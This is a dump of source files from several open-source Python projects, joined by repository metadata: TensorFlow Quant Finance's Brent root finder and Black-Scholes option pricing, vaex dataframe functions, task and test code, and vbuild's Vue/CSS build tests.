`tf.reduce_all` (which returns only when the search is finished for all
pairs of points), and `tf.reduce_any` (which returns as soon as the search
is finished for any pair of points).
Default value: `None` which translates to `tf.reduce_all`.
validate_args: Python `bool` indicating whether to validate arguments such
as `left_bracket`, `right_bracket`, `absolute_root_tolerance`,
`relative_root_tolerance`, `function_tolerance`, and `max_iterations`.
Default value: `False`.
name: Python `str` name prefixed to ops created by this function.
Returns:
brent_results: A Python object containing the following attributes:
estimated_root: `Tensor` containing the best estimate explored. If the
search was successful within the specified tolerance, this estimate is
a root of the objective function.
objective_at_estimated_root: `Tensor` containing the value of the
objective function at `estimated_root`. If the search was successful
within the specified tolerance, then this is close to 0. It has the
same dtype and shape as `estimated_root`.
num_iterations: `Tensor` containing the number of iterations performed.
It has the same dtype as `max_iterations` and shape as `estimated_root`.
converged: Scalar boolean `Tensor` indicating whether `estimated_root` is
a root within the tolerance specified for the search. It has the same
shape as `estimated_root`.
Raises:
ValueError: if the `stopping_policy_fn` is not callable.
#### Examples
```python
import tensorflow as tf
tf.enable_eager_execution()
# Example 1: Roots of a single function for two pairs of starting points.
f = lambda x: 63 * x**5 - 70 * x**3 + 15 * x + 2
x1 = tf.constant([-10, 1], dtype=tf.float64)
x2 = tf.constant([10, -1], dtype=tf.float64)
tf.math.brentq(objective_fn=f, left_bracket=x1, right_bracket=x2)
# ==> BrentResults(
# estimated_root=array([-0.14823253, -0.14823253]),
# objective_at_estimated_root=array([3.27515792e-15, 0.]),
# num_iterations=array([11, 6]),
# converged=array([True, True]))
tf.math.brentq(objective_fn=f,
left_bracket=x1,
right_bracket=x2,
stopping_policy_fn=tf.reduce_any)
# ==> BrentResults(
# estimated_root=array([-2.60718234, -0.14823253]),
# objective_at_estimated_root=array([-6.38579115e+03, 2.39763764e-11]),
# num_iterations=array([7, 6]),
# converged=array([False, True]))
# Example 2: Roots of a multiplex function for one pair of starting points.
def f(x):
return tf.constant([0., 63.], dtype=tf.float64) * x**5 \
+ tf.constant([5., -70.], dtype=tf.float64) * x**3 \
+ tf.constant([-3., 15.], dtype=tf.float64) * x \
+ 2
x1 = tf.constant([-5, -5], dtype=tf.float64)
x2 = tf.constant([5, 5], dtype=tf.float64)
tf.math.brentq(objective_fn=f, left_bracket=x1, right_bracket=x2)
# ==> BrentResults(
# estimated_root=array([-1., -0.14823253]),
# objective_at_estimated_root=array([0., 2.08721929e-14]),
# num_iterations=array([13, 11]),
# converged=array([True, True]))
# Example 3: Roots of a multiplex function for two pairs of starting points.
def f(x):
return tf.constant([0., 63.], dtype=tf.float64) * x**5 \
+ tf.constant([5., -70.], dtype=tf.float64) * x**3 \
+ tf.constant([-3., 15.], dtype=tf.float64) * x \
+ 2
x1 = tf.constant([[-5, -5], [10, 10]], dtype=tf.float64)
x2 = tf.constant([[5, 5], [-10, -10]], dtype=tf.float64)
tf.math.brentq(objective_fn=f, left_bracket=x1, right_bracket=x2)
# ==> BrentResults(
# estimated_root=array([
# [-1, -0.14823253],
# [-1, -0.14823253]]),
# objective_at_estimated_root=array([
# [0., 2.08721929e-14],
# [0., 2.08721929e-14]]),
# num_iterations=array([
# [13, 11],
# [15, 11]]),
# converged=array([
# [True, True],
# [True, True]]))
```
"""
return _brent(
objective_fn,
left_bracket,
right_bracket,
value_at_left_bracket=value_at_left_bracket,
value_at_right_bracket=value_at_right_bracket,
absolute_root_tolerance=absolute_root_tolerance,
relative_root_tolerance=relative_root_tolerance,
function_tolerance=function_tolerance,
max_iterations=max_iterations,
stopping_policy_fn=stopping_policy_fn,
validate_args=validate_args,
name=name)
```
#### File: tf_quant_finance/volatility/black_scholes.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow_probability as tfp
def option_price(forwards,
strikes,
volatilities,
expiries,
discount_factors=None,
is_call_options=None,
dtype=None,
name=None):
"""Computes the Black Scholes price for a batch of European options.
## References:
[1] Hull, <NAME>., Options, Futures and Other Derivatives. Pearson, 2018.
[2] Wikipedia contributors. Black-Scholes model. Available at:
https://en.wikipedia.org/w/index.php?title=Black%E2%80%93Scholes_model
Args:
forwards: A real `Tensor` of any shape. The current forward prices to
expiry.
strikes: A real `Tensor` of the same shape and dtype as `forwards`. The
strikes of the options to be priced.
volatilities: A real `Tensor` of same shape and dtype as `forwards`. The
volatility to expiry.
expiries: A real `Tensor` of same shape and dtype as `forwards`. The expiry
for each option. The units should be such that `expiry * volatility**2` is
dimensionless.
discount_factors: A real `Tensor` of same shape and dtype as the `forwards`.
The discount factors to expiry (i.e. e^(-rT)). If not specified, no
discounting is applied (i.e. the undiscounted option price is returned).
Default value: None, interpreted as discount factors = 1.
is_call_options: A boolean `Tensor` of a shape compatible with `forwards`.
Indicates whether to compute the price of a call (if True) or a put (if
False). If not supplied, it is assumed that every element is a call.
dtype: Optional `tf.DType`. If supplied, the dtype to be used for conversion
of any supplied non-`Tensor` arguments to `Tensor`.
Default value: None which maps to the default dtype inferred by TensorFlow
(float32).
name: str. The name for the ops created by this function.
Default value: None which is mapped to the default name `option_price`.
Returns:
option_prices: A `Tensor` of the same shape as `forwards`. The Black
Scholes price of the options.
#### Examples
```python
forwards = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
strikes = np.array([3.0, 3.0, 3.0, 3.0, 3.0])
volatilities = np.array([0.0001, 102.0, 2.0, 0.1, 0.4])
expiries = 1.0
computed_prices = option_price(
forwards,
strikes,
volatilities,
expiries,
dtype=tf.float64)
# Expected print output of computed prices:
# [ 0. 2. 2.04806848 1.00020297 2.07303131]
```
"""
with tf.compat.v1.name_scope(
name,
default_name='option_price',
values=[
forwards, strikes, volatilities, expiries, discount_factors,
is_call_options
]):
forwards = tf.convert_to_tensor(forwards, dtype=dtype, name='forwards')
strikes = tf.convert_to_tensor(strikes, dtype=dtype, name='strikes')
volatilities = tf.convert_to_tensor(
volatilities, dtype=dtype, name='volatilities')
expiries = tf.convert_to_tensor(expiries, dtype=dtype, name='expiries')
if discount_factors is None:
discount_factors = 1
discount_factors = tf.convert_to_tensor(
discount_factors, dtype=dtype, name='discount_factors')
normal = tfp.distributions.Normal(
loc=tf.zeros([], dtype=forwards.dtype), scale=1)
sqrt_var = volatilities * tf.math.sqrt(expiries)
d1 = (tf.math.log(forwards / strikes) + sqrt_var * sqrt_var / 2) / sqrt_var
d2 = d1 - sqrt_var
undiscounted_calls = forwards * normal.cdf(d1) - strikes * normal.cdf(d2)
if is_call_options is None:
return discount_factors * undiscounted_calls
undiscounted_forward = forwards - strikes
undiscounted_puts = undiscounted_calls - undiscounted_forward
return discount_factors * tf.where(is_call_options, undiscounted_calls,
undiscounted_puts)
def binary_price(forwards,
strikes,
volatilities,
expiries,
discount_factors=None,
is_call_options=None,
dtype=None,
name=None):
"""Computes the Black Scholes price for a batch of European binary options.
The binary call (resp. put) option priced here is that which pays off a unit
of cash if the underlying asset has a value greater (resp. smaller) than the
strike price at expiry. Hence the binary option price is the discounted
probability that the asset will end up higher (resp. lower) than the
strike price at expiry.
## References:
[1] <NAME>., Options, Futures and Other Derivatives. Pearson, 2018.
[2] Wikipedia contributors. Binary option. Available at:
https://en.wikipedia.org/w/index.php?title=Binary_option
Args:
forwards: A real `Tensor` of any shape. The current forward prices to
expiry.
strikes: A real `Tensor` of the same shape and dtype as `forwards`. The
strikes of the options to be priced.
volatilities: A real `Tensor` of same shape and dtype as `forwards`. The
volatility to expiry.
expiries: A real `Tensor` of same shape and dtype as `forwards`. The expiry
for each option. The units should be such that `expiry * volatility**2` is
dimensionless.
discount_factors: A real `Tensor` of same shape and dtype as the `forwards`.
The discount factors to expiry (i.e. e^(-rT)). If not specified, no
discounting is applied (i.e. the undiscounted option price is returned).
Default value: None, interpreted as discount factors = 1.
is_call_options: A boolean `Tensor` of a shape compatible with `forwards`.
Indicates whether to compute the price of a call (if True) or a put (if
False). If not supplied, it is assumed that every element is a call.
dtype: Optional `tf.DType`. If supplied, the dtype to be used for conversion
of any supplied non-`Tensor` arguments to `Tensor`.
Default value: None which maps to the default dtype inferred by TensorFlow
(float32).
name: str. The name for the ops created by this function.
Default value: None which is mapped to the default name `binary_price`.
Returns:
option_prices: A `Tensor` of the same shape as `forwards`. The Black
Scholes price of the binary options with unit of cash payoff.
#### Examples
```python
forwards = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
strikes = np.array([3.0, 3.0, 3.0, 3.0, 3.0])
volatilities = np.array([0.0001, 102.0, 2.0, 0.1, 0.4])
expiries = 1.0
prices = binary_price(forwards, strikes, volatilities, expiries,
dtype=tf.float64)
# Expected print output of prices:
# [0. 0. 0.15865525 0.99764937 0.85927418]
```
"""
with tf.compat.v1.name_scope(
name,
default_name='binary_price',
values=[
forwards, strikes, volatilities, expiries, discount_factors,
is_call_options
]):
forwards = tf.convert_to_tensor(forwards, dtype=dtype, name='forwards')
strikes = tf.convert_to_tensor(strikes, dtype=dtype, name='strikes')
volatilities = tf.convert_to_tensor(
volatilities, dtype=dtype, name='volatilities')
expiries = tf.convert_to_tensor(expiries, dtype=dtype, name='expiries')
if is_call_options is None:
is_call_options = True
if discount_factors is None:
discount_factors = 1
discount_factors = tf.convert_to_tensor(
discount_factors, dtype=dtype, name='discount_factors')
sqrt_var = volatilities * tf.math.sqrt(expiries)
d2 = (tf.math.log(forwards / strikes) - sqrt_var * sqrt_var / 2) / sqrt_var
one = tf.ones_like(forwards)
d2_signs = tf.where(is_call_options, one, -one)
normal = tfp.distributions.Normal(
loc=tf.zeros([], dtype=forwards.dtype), scale=1)
return discount_factors * normal.cdf(d2_signs * d2)
``` |
{
"source": "0xflotus/vaex",
"score": 3
} |
#### File: vaex-core/vaex/functions.py
```python
import vaex.serialize
import json
import numpy as np
# @vaex.serialize.register
# class Function(FunctionSerializable):
# name maps to numpy function
# <vaex name>:<numpy name>
function_mapping = [name.strip().split(":") if ":" in name else (name, name) for name in """
sinc
sin
cos
tan
arcsin
arccos
arctan
arctan2
sinh
cosh
tanh
arcsinh
arccosh
arctanh
log
log10
log1p
exp
expm1
sqrt
abs
where
rad2deg
deg2rad
minimum
maximum
clip
nan
searchsorted
""".strip().split()]
expression_namespace = {}
for name, numpy_name in function_mapping:
if not hasattr(np, numpy_name):
raise SystemError("numpy does not have: %s" % numpy_name)
else:
expression_namespace[name] = getattr(np, numpy_name)
def fillna(ar, value, fill_nan=True, fill_masked=True):
'''Returns an array where missing values are replaced by value.
If the dtype is object, nan values and 'nan' string values
are replaced by value when fill_nan==True.
'''
if ar.dtype.kind in 'O' and fill_nan:
strings = ar.astype(str)
mask = strings == 'nan'
ar = ar.copy()
ar[mask] = value
elif ar.dtype.kind in 'f' and fill_nan:
mask = np.isnan(ar)
if np.any(mask):
ar = ar.copy()
ar[mask] = value
if fill_masked and np.ma.isMaskedArray(ar):
mask = ar.mask
if np.any(mask):
ar = ar.data.copy()
ar[mask] = value
return ar
expression_namespace['fillna'] = fillna
def dt_dayofweek(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.dayofweek.values
def dt_dayofyear(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.dayofyear.values
def dt_year(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.year.values
def dt_weekofyear(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.weekofyear.values
def dt_hour(x):
import pandas as pd
# x = x.astype("<M8[ns]")
return pd.Series(x).dt.hour.values
expression_namespace["dt_dayofweek"] = dt_dayofweek
expression_namespace["dt_dayofyear"] = dt_dayofyear
expression_namespace["dt_year"] = dt_year
expression_namespace["dt_weekofyear"] = dt_weekofyear
expression_namespace["dt_hour"] = dt_hour
def str_strip(x, chars=None):
# don't change the dtype, otherwise for each block the dtype may be different (string length)
return np.char.strip(x, chars).astype(x.dtype)
expression_namespace['str_strip'] = str_strip
def _float(x):
return x.astype(np.float64)
def _astype(x, dtype):
return x.astype(dtype)
expression_namespace["float"] = _float
expression_namespace["astype"] = _astype
def add_geo_json(ds, json_or_file, column_name, longitude_expression, latitude_expresion, label=None, persist=True, overwrite=False, inplace=False, mapping=None):
ds = ds if inplace else ds.copy()
if not isinstance(json_or_file, (list, tuple)):
with open(json_or_file) as f:
geo_json = json.load(f)
else:
geo_json = json_or_file
def default_label(properties):
return " - ".join(properties.values())
label = label or default_label
features = geo_json['features']
list_of_polygons = []
labels = []
if mapping:
mapping_dict = {}
for i, feature in enumerate(features[:]):
geo = feature['geometry']
properties = feature['properties']
if mapping:
mapping_dict[properties[mapping]] = i
# print(properties)
# label = f"{properties['borough']} - {properties['zone']}'"
labels.append(label(properties))#roperties[label_key])
list_of_polygons.append([np.array(polygon_set[0]).T for polygon_set in geo['coordinates']])
M = np.sum([polygon_set.shape[1] for polygon_set in list_of_polygons[-1]])
# print(M)
# N += M
ds[column_name] = ds.func.inside_which_polygons(longitude_expression, latitude_expresion, list_of_polygons)
if persist:
ds.persist(column_name, overwrite=overwrite)
ds.categorize(column_name, labels=labels, check=False)
if mapping:
return ds, mapping_dict
else:
return ds
```
#### File: vaex-core/vaex/tasks.py
```python
from functools import reduce
import logging
import numpy as np
import vaex.promise
from .utils import (_ensure_strings_from_expressions,
_ensure_string_from_expression,
_ensure_list,
_is_limit,
_isnumber,
_issequence,
_is_string,
_parse_reduction,
_parse_n,
_normalize_selection_name,
_normalize,
_parse_f,
_expand,
_expand_shape,
_expand_limits,
as_flat_float,
as_flat_array,
_split_and_combine_mask)
logger = logging.getLogger('vaex.tasks')
class Task(vaex.promise.Promise):
"""
:type: signal_progress: Signal
"""
def __init__(self, df=None, expressions=[], name="task"):
vaex.promise.Promise.__init__(self)
self.df = df
self.expressions = expressions
self.expressions_all = list(expressions)
self.signal_progress = vaex.events.Signal("progress (float)")
self.progress_fraction = 0
self.signal_progress.connect(self._set_progress)
self.cancelled = False
self.name = name
def _set_progress(self, fraction):
self.progress_fraction = fraction
return not self.cancelled # don't cancel
def cancel(self):
self.cancelled = True
@property
def dimension(self):
return len(self.expressions)
@classmethod
def create(cls):
ret = Task()
return ret
def create_next(self):
ret = Task(self.df, [])
self.signal_progress.connect(ret.signal_progress.emit)
return ret
class TaskBase(Task):
def __init__(self, df, expressions, selection=None, to_float=False, dtype=np.float64, name="TaskBase"):
if not isinstance(expressions, (tuple, list)):
expressions = [expressions]
# edges include everything outside at index 1 and -1, and nan's at index 0, so we add 3 to each dimension
self.selection_waslist, [self.selections, ] = vaex.utils.listify(selection)
Task.__init__(self, df, expressions, name=name)
self.to_float = to_float
self.dtype = dtype
def map(self, thread_index, i1, i2, *blocks):
class Info(object):
pass
info = Info()
info.i1 = i1
info.i2 = i2
info.first = i1 == 0
info.last = i2 == self.df.length_unfiltered()
info.size = i2 - i1
masks = [np.ma.getmaskarray(block) for block in blocks if np.ma.isMaskedArray(block)]
blocks = [block.data if np.ma.isMaskedArray(block) else block for block in blocks]
mask = None
if masks:
# find all 'rows', where all columns are present (not masked)
mask = masks[0].copy()
for other in masks[1:]:
mask |= other
# masked arrays mean mask==1 is masked, for vaex we use mask==1 is used
# blocks = [block[~mask] for block in blocks]
if self.to_float:
blocks = [as_flat_float(block) for block in blocks]
for i, selection in enumerate(self.selections):
if selection or self.df.filtered:
selection_mask = self.df.evaluate_selection_mask(selection, i1=i1, i2=i2, cache=True) # TODO
if selection_mask is None:
raise ValueError("performing operation on selection while no selection present")
if mask is not None:
selection_mask = selection_mask[~mask]
selection_blocks = [block[selection_mask] for block in blocks]
else:
selection_blocks = [block for block in blocks]
little_endians = len([k for k in selection_blocks if k.dtype.byteorder in ["<", "="]])
if not ((len(selection_blocks) == little_endians) or little_endians == 0):
def _to_native(ar):
if ar.dtype.byteorder not in ["<", "="]:
dtype = ar.dtype.newbyteorder()
return ar.astype(dtype)
else:
return ar
selection_blocks = [_to_native(k) for k in selection_blocks]
subblock_weight = None
if len(selection_blocks) == len(self.expressions) + 1:
subblock_weight = selection_blocks[-1]
selection_blocks = list(selection_blocks[:-1])
self.map_processed(thread_index, i1, i2, mask, *blocks)
return i2 - i1
class TaskMapReduce(Task):
def __init__(self, df, expressions, map, reduce, converter=lambda x: x, info=False, to_float=False, name="task"):
Task.__init__(self, df, expressions, name=name)
self._map = map
self._reduce = reduce
self.converter = converter
self.info = info
self.to_float = to_float
def map(self, thread_index, i1, i2, *blocks):
if self.to_float:
blocks = [as_flat_float(block) for block in blocks]
if self.info:
return self._map(thread_index, i1, i2, *blocks)
else:
return self._map(*blocks) # [self.map(block) for block in blocks]
def reduce(self, results):
return self.converter(reduce(self._reduce, results))
class TaskApply(TaskBase):
def __init__(self, df, expressions, f, info=False, to_float=False, name="apply", masked=False, dtype=np.float64):
TaskBase.__init__(self, df, expressions, selection=None, to_float=to_float, name=name)
self.f = f
self.dtype = dtype
self.data = np.zeros(df.length_unfiltered(), dtype=self.dtype)
self.mask = None
if masked:
self.mask = np.zeros(df.length_unfiltered(), dtype=np.bool)
self.array = np.ma.array(self.data, mask=self.mask, shrink=False)
else:
self.array = self.data
self.info = info
self.to_float = to_float
def map_processed(self, thread_index, i1, i2, mask, *blocks):
if self.to_float:
blocks = [as_flat_float(block) for block in blocks]
print(len(self.array), i1, i2)
for i in range(i1, i2):
print(i)
if mask is None or mask[i]:
v = [block[i - i1] for block in blocks]
self.data[i] = self.f(*v)
if mask is not None:
self.mask[i] = False
else:
self.mask[i] = True
print(v)
print(self.array, self.array.dtype)
return None
def reduce(self, results):
return None
# import numba
# @numba.jit(nopython=True, nogil=True)
# def histogram_numba(x, y, weight, grid, xmin, xmax, ymin, ymax):
# scale_x = 1./ (xmax-xmin);
# scale_y = 1./ (ymax-ymin);
# counts_length_y, counts_length_x = grid.shape
# for i in range(len(x)):
# value_x = x[i];
# value_y = y[i];
# scaled_x = (value_x - xmin) * scale_x;
# scaled_y = (value_y - ymin) * scale_y;
#
# if ( (scaled_x >= 0) & (scaled_x < 1) & (scaled_y >= 0) & (scaled_y < 1) ) :
# index_x = (int)(scaled_x * counts_length_x);
# index_y = (int)(scaled_y * counts_length_y);
# grid[index_y, index_x] += 1;
class StatOp(object):
def __init__(self, code, fields, reduce_function=np.nansum, dtype=None):
self.code = code
self.fixed_fields = fields
self.reduce_function = reduce_function
self.dtype = dtype
def init(self, grid):
pass
def fields(self, weights):
return self.fixed_fields
def reduce(self, grid, axis=0):
value = self.reduce_function(grid, axis=axis)
if self.dtype:
return value.astype(self.dtype)
else:
return value
class StatOpMinMax(StatOp):
def __init__(self, code, fields):
super(StatOpMinMax, self).__init__(code, fields)
def init(self, grid):
grid[..., 0] = np.inf
grid[..., 1] = -np.inf
def reduce(self, grid, axis=0):
out = np.zeros(grid.shape[1:], dtype=grid.dtype)
out[..., 0] = np.nanmin(grid[..., 0], axis=axis)
out[..., 1] = np.nanmax(grid[..., 1], axis=axis)
return out
class StatOpCov(StatOp):
def __init__(self, code, fields=None, reduce_function=np.sum):
super(StatOpCov, self).__init__(code, fields, reduce_function=reduce_function)
def fields(self, weights):
N = len(weights)
# counts, sums, cross product sums
return N * 2 + N**2 * 2 # ((N+1) * N) // 2 *2
class StatOpFirst(StatOp):
def __init__(self, code):
super(StatOpFirst, self).__init__(code, 2, reduce_function=self._reduce_function)
def init(self, grid):
grid[..., 0] = np.nan
grid[..., 1] = np.inf
def _reduce_function(self, grid, axis=0):
values = grid[...,0]
order_values = grid[...,1]
indices = np.argmin(order_values, axis=0)
# see e.g. https://stackoverflow.com/questions/46840848/numpy-how-to-use-argmax-results-to-get-the-actual-max?noredirect=1&lq=1
# and https://jakevdp.github.io/PythonDataScienceHandbook/02.07-fancy-indexing.html
if len(values.shape) == 2: # no binby
return values[indices, np.arange(values.shape[1])[:,None]][0]
if len(values.shape) == 3: # 1d binby
return values[indices, np.arange(values.shape[1])[:,None], np.arange(values.shape[2])]
if len(values.shape) == 4: # 2d binby
return values[indices, np.arange(values.shape[1])[:,None], np.arange(values.shape[2])[None,:,None], np.arange(values.shape[3])]
else:
raise ValueError('dimension %d not yet supported' % len(values.shape))
def fields(self, weights):
# the value found, and the value by which it is ordered
return 2
OP_ADD1 = StatOp(0, 1)
OP_COUNT = StatOp(1, 1)
OP_MIN_MAX = StatOpMinMax(2, 2)
OP_ADD_WEIGHT_MOMENTS_01 = StatOp(3, 2, np.nansum)
OP_ADD_WEIGHT_MOMENTS_012 = StatOp(4, 3, np.nansum)
OP_COV = StatOpCov(5)
OP_FIRST = StatOpFirst(6)
class TaskStatistic(Task):
def __init__(self, df, expressions, shape, limits, masked=False, weights=[], weight=None, op=OP_ADD1, selection=None, edges=False):
if not isinstance(expressions, (tuple, list)):
expressions = [expressions]
# edges include everything outside at index 1 and -1, and nan's at index 0, so we add 3 to each dimension
self.shape = tuple([k + 3 if edges else k for k in _expand_shape(shape, len(expressions))])
self.limits = limits
if weight is not None: # shortcut for weights=[weight]
assert weights == [], 'only provide weight or weights, not both'
weights = [weight]
del weight
self.weights = weights
self.selection_waslist, [self.selections, ] = vaex.utils.listify(selection)
self.op = op
self.edges = edges
Task.__init__(self, df, expressions, name="statisticNd")
#self.dtype = np.int64 if self.op == OP_ADD1 else np.float64 # TODO: use int64 fir count and ADD1
self.dtype = np.float64
self.masked = masked
self.fields = op.fields(weights)
self.shape_total = (self.df.executor.thread_pool.nthreads,) + (len(self.selections), ) + self.shape + (self.fields,)
self.grid = np.zeros(self.shape_total, dtype=self.dtype)
self.op.init(self.grid)
self.minima = []
self.maxima = []
limits = np.array(self.limits)
if len(limits) != 0:
logger.debug("limits = %r", limits)
assert limits.shape[-1] == 2, "expected last dimension of limits to have a length of 2 (not %d, total shape: %s), of the form [[xmin, xmin], ... [zmin, zmax]], not %s" % (limits.shape[-1], limits.shape, limits)
if len(limits.shape) == 1: # short notation: [xmin, max], instead of [[xmin, xmax]]
limits = [limits]
logger.debug("limits = %r", limits)
for limit in limits:
vmin, vmax = limit
self.minima.append(float(vmin))
self.maxima.append(float(vmax))
# if self.weight is not None:
self.expressions_all.extend(weights)
def __repr__(self):
name = self.__class__.__module__ + "." + self.__class__.__name__
return "<%s(df=%r, expressions=%r, shape=%r, limits=%r, weights=%r, selections=%r, op=%r)> instance at 0x%x" % (name, self.df, self.expressions, self.shape, self.limits, self.weights, self.selections, self.op, id(self))
def map(self, thread_index, i1, i2, *blocks):
class Info(object):
pass
info = Info()
info.i1 = i1
info.i2 = i2
info.first = i1 == 0
info.last = i2 == self.df.length_unfiltered()
info.size = i2 - i1
masks = [np.ma.getmaskarray(block) for block in blocks if np.ma.isMaskedArray(block)]
blocks = [block.data if np.ma.isMaskedArray(block) else block for block in blocks]
mask = None
if masks:
mask = masks[0].copy()
for other in masks[1:]:
mask |= other
blocks = [block[~mask] for block in blocks]
#blocks = [as_flat_float(block) for block in blocks]
if len(blocks) != 0:
dtype = np.find_common_type([block.dtype for block in blocks], [])
histogram2d = vaex.vaexfast.histogram2d
if dtype.str in ">f8 <f8 =f8":
statistic_function = vaex.vaexfast.statisticNd_f8
elif dtype.str in ">f4 <f4 =f4":
statistic_function = vaex.vaexfast.statisticNd_f4
histogram2d = vaex.vaexfast.histogram2d_f4
elif dtype.str in ">i8 <i8 =i8":
dtype = np.dtype(np.float64)
statistic_function = vaex.vaexfast.statisticNd_f8
else:
dtype = np.dtype(np.float32)
statistic_function = vaex.vaexfast.statisticNd_f4
histogram2d = vaex.vaexfast.histogram2d_f4
#print(dtype, statistic_function, histogram2d)
blocks = [as_flat_array(block, dtype) for block in blocks]
this_thread_grid = self.grid[thread_index]
for i, selection in enumerate(self.selections):
if selection or self.df.filtered:
selection_mask = self.df.evaluate_selection_mask(selection, i1=i1, i2=i2, cache=True) # TODO
if selection_mask is None:
raise ValueError("performing operation on selection while no selection present")
if mask is not None:
selection_mask = selection_mask[~mask]
selection_blocks = [block[selection_mask] for block in blocks]
else:
selection_blocks = [block for block in blocks]
little_endians = len([k for k in selection_blocks if k.dtype.byteorder in ["<", "="]])
if not ((len(selection_blocks) == little_endians) or little_endians == 0):
def _to_native(ar):
if ar.dtype.byteorder not in ["<", "="]:
dtype = ar.dtype.newbyteorder()
return ar.astype(dtype)
else:
return ar
selection_blocks = [_to_native(k) for k in selection_blocks]
subblock_weight = None
subblock_weights = selection_blocks[len(self.expressions):]
selection_blocks = list(selection_blocks[:len(self.expressions)])
if len(selection_blocks) == 0 and subblock_weights == []:
if self.op == OP_ADD1: # special case for counting '*' (i.e. the number of rows)
if selection or self.df.filtered:
this_thread_grid[i][0] += np.sum(selection_mask)
else:
this_thread_grid[i][0] += i2 - i1
else:
raise ValueError("Nothing to compute for OP %s" % self.op.code)
else:
#blocks = list(blocks) # histogramNd wants blocks to be a list
# if False: #len(selection_blocks) == 2 and self.op == OP_ADD1: # special case, slighty faster
# #print('fast case!')
# assert len(subblock_weights) <= 1
# histogram2d(selection_blocks[0], selection_blocks[1], subblock_weights[0] if len(subblock_weights) else None,
# this_thread_grid[i,...,0],
# self.minima[0], self.maxima[0], self.minima[1], self.maxima[1])
# else:
statistic_function(selection_blocks, subblock_weights, this_thread_grid[i], self.minima, self.maxima, self.op.code, self.edges)
return i2 - i1
# return map(self._map, blocks)#[self.map(block) for block in blocks]
def reduce(self, results):
# for i in range(1, self.subspace.executor.thread_pool.nthreads):
# self.data[0] += self.data[i]
# return self.data[0]
# return self.data
grid = self.op.reduce(self.grid)
# If selection was a string, we just return the single selection
return grid if self.selection_waslist else grid[0]
```
#### File: vaex/tests/category_test.py
```python
from common import *
import collections
import numpy as np
import vaex
import pytest
def test_cat_string():
ds0 = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'])
ds = ds0.label_encode('colors')#, ['red', 'green'], inplace=True)
assert ds.iscategory('colors')
assert ds.limits('colors', shape=128) == ([-0.5, 2.5], 3)
ds = ds0.label_encode('colors', values=['red', 'green'])
assert ds.iscategory('colors')
assert ds.limits('colors', shape=128) == ([-0.5, 1.5], 2)
assert ds.data.colors.tolist() == [0, 1, None, 1]
assert ds.copy().iscategory(ds.colors)
# with pytest.raises(ValueError):
# assert ds.iscategory('colors', values=['red', 'orange'])
def test_count_cat():
ds0 = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'], counts=[1, 2, 3, 4])
ds0 = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'], names=['apple', 'apple', 'berry', 'apple'])
ds = ds0.label_encode(ds0.colors)
ds = ds0.label_encode(ds0.names)
ds = ds0.label_encode('colors', ['red', 'green', 'blue'])
assert ds.count(binby=ds.colors).tolist() == [1, 2, 1]
ds = ds0.label_encode('colors', ['red', 'blue', 'green', ], inplace=True)
assert ds.count(binby=ds.colors).tolist() == [1, 1, 2]
def test_categorize():
ds0 = vaex.from_arrays(c=[0, 1, 1, 3])
ds0.categorize('c', ['a', 'b', 'c', 'd'])
assert ds0.iscategory(ds0.c)
assert ds0.category_labels(ds0.c) == ['a', 'b', 'c', 'd']
assert ds0.category_count(ds0.c) == 4
# def test_plot_cat():
# ds = vaex.from_arrays(colors=['red', 'green', 'blue', 'green'], counts=[4, ])
# ds.categorize('colors', inplace=True)#, ['red', 'green'], inplace=True)
```
#### File: vaex/tests/export_test.py
```python
from common import *
def test_export(ds_local, tmpdir):
ds = ds_local
# TODO: we eventually want to support dtype=object, but not for hdf5
ds = ds.drop(ds.obj)
path = str(tmpdir.join('test.hdf5'))
ds.export_hdf5(path)
ds = ds.sample(5)
path = str(tmpdir.join('sample.hdf5'))
ds.export_hdf5(path)
``` |
{
"source": "0xflotus/vbuild",
"score": 2
} |
#### File: 0xflotus/vbuild/tests.py
```python
import vbuild,sys
import unittest
class TesCss(unittest.TestCase):
def test_css1(self):
self.assertEqual(vbuild.mkPrefixCss("","XXX"),"")
def test_css2(self):
self.assertEqual(vbuild.mkPrefixCss(" a {color} "), "a {color}")
self.assertEqual(vbuild.mkPrefixCss(" a {color} ","XXX"),"XXX a {color}")
def test_cssTop(self):
t="""
:scope
{padding:4px;background: yellow}
button[ name ] {\t\tbackground:red /*que neni*/
}
hr *, body:hover {
color:red;}
p > a, p>i { /*nib*/ }
"""
ok="""
XXX {padding:4px;background: yellow}
XXX button[ name ] { background:red }
XXX hr *, XXX body:hover { color:red;}
XXX p > a, XXX p>i { }
"""
tt=vbuild.mkPrefixCss(t,"XXX")
self.assertEqual(tt,ok.strip())
class TestB(unittest.TestCase):
def test_composant_complet(self):
h="""
<template>
<div>
{{c}} <button @click="inc">++</button>
</div>
</template>
<script>
export default {
data () {
return {
c: 0,
}
},
methods: {
inc() {this.c+=1;}
}
}
</script>
<style>
:scope {
padding:4px;
background: yellow
}
button {background:red}
</style>
"""
r=vbuild.VBuild("name.vue",h)
#~ print(r, file=sys.stdout)
self.assertEqual(r.tags,["name"])
self.assertEqual(str(r).count("div[data-name]"),2)
self.assertFalse(":scope" in str(r))
self.assertTrue("<div data-name>" in str(r))
self.assertTrue('<script type="text/x-template" id="tpl-name">' in str(r))
self.assertTrue("var name = Vue.component('name', {template:'#tpl-name'," in str(r))
def test_composant_min(self):
h="""
<template>
<div>Load</div>
</template>
"""
r=vbuild.VBuild("name.vue",h)
self.assertTrue("<div data-name>" in str(r))
self.assertTrue('<script type="text/x-template" id="tpl-name">' in str(r))
self.assertTrue("var name = Vue.component('name', {template:'#tpl-name'," in str(r))
def test_composant_add(self):
c=vbuild.VBuild("c.vue","""<template><div>XXX</div></template>""")
cc=sum([c,c])
self.assertTrue(cc.html.count("<div data-c>XXX</div>")==2)
self.assertTrue(cc.script.count("var c = Vue.component('c', {template:'#tpl-c',});")==2)
self.assertTrue(cc.style=="")
def test_pickable(self): # so it's GAE memcach'able !
h="""
<template>
<div>Load</div>
</template>
"""
import pickle
r=vbuild.VBuild("name.vue",h)
f_string = pickle.dumps(r)
